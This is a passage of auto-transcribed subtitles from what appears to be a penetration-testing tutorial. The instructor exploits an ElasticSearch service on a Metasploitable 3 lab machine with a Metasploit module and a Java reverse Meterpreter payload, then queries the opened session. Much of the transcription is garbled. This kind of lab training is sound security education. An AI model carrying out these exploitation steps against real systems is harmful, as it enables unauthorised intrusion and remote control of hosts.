1
00:00:00,300 --> 00:00:06,180
So let's list the services again to choose one way too many.

2
00:00:06,330 --> 00:00:09,630
So let's just list the medicine, voidable three services.

3
00:00:11,690 --> 00:00:16,460
All right, so let's just list HTP related vulnerabilities.

4
00:00:20,970 --> 00:00:24,390
And sort them, according to report, no.

5
00:00:26,420 --> 00:00:30,930
Right, so here are some HTP services on the different ports.

6
00:00:31,530 --> 00:00:34,970
Now I'm going to plan on looking for many of them.

7
00:00:36,090 --> 00:00:45,240
But first, I'll start with the ElasticSearch service, so let's copy the service name with its version

8
00:00:45,240 --> 00:00:49,260
number to check the Internet to see if there's a vulnerability.

9
00:00:50,590 --> 00:00:52,780
Right, so just open your browser and.

10
00:00:53,830 --> 00:00:55,210
They set the address bar.

11
00:00:56,280 --> 00:00:56,730
Now.

12
00:00:58,030 --> 00:01:01,330
If you're seeing what I'm seeing, the Rapid Seven site comes up first.

13
00:01:02,620 --> 00:01:08,020
And I'll abandon the search for any additional information, but you can go ahead and read some of the

14
00:01:08,020 --> 00:01:09,640
articles for this vulnerability.

15
00:01:11,300 --> 00:01:16,040
And this is the module name that you will see and we will use.

16
00:01:17,300 --> 00:01:21,890
Now, you can also search ElasticSearch as a phrase in Métis boy.

17
00:01:22,780 --> 00:01:31,330
And I'll reiterate that there's not a right or wrong here, it's just about whatever suits your strategy.

18
00:01:32,380 --> 00:01:32,710
All right.

19
00:01:32,710 --> 00:01:34,420
So copy the name.

20
00:01:36,390 --> 00:01:37,980
Minimize the browser window.

21
00:01:40,500 --> 00:01:43,950
Type use and then paste the name of the module.

22
00:01:45,890 --> 00:01:51,650
Show me the options and let's have a look at the payloads to.

23
00:01:53,980 --> 00:01:56,020
All right, so set payload to.

24
00:01:58,890 --> 00:02:03,000
Java Interpretor Rivers E.S.P.

25
00:02:04,230 --> 00:02:05,660
Show me the options.

26
00:02:06,980 --> 00:02:19,460
OK, set our host to tend tend to 10 set, I'll host to 10 that tend to dot 11.

27
00:02:20,850 --> 00:02:22,350
And I think everything's OK.

28
00:02:23,680 --> 00:02:27,400
So let me show the missing variables.

29
00:02:30,560 --> 00:02:34,940
And there are no missing variables, right, so I can run the module.

30
00:02:35,840 --> 00:02:37,490
Or XPoint.

31
00:02:40,290 --> 00:02:46,950
Another maturity session has also opened, so who am I get Eweida?

32
00:02:48,440 --> 00:02:49,570
Where am I?

33
00:02:50,600 --> 00:02:51,530
CIS info.

34
00:02:53,170 --> 00:02:59,020
And I'll stay at this stage so that I can send the session to the background.

35
00:03:00,040 --> 00:03:00,880
Sessions.

36
00:03:02,740 --> 00:03:06,160
And these are the sessions that are on Métis Portable three.

37
00:03:07,290 --> 00:03:10,920
Rebecca Dimino, let's dig into some of the other services.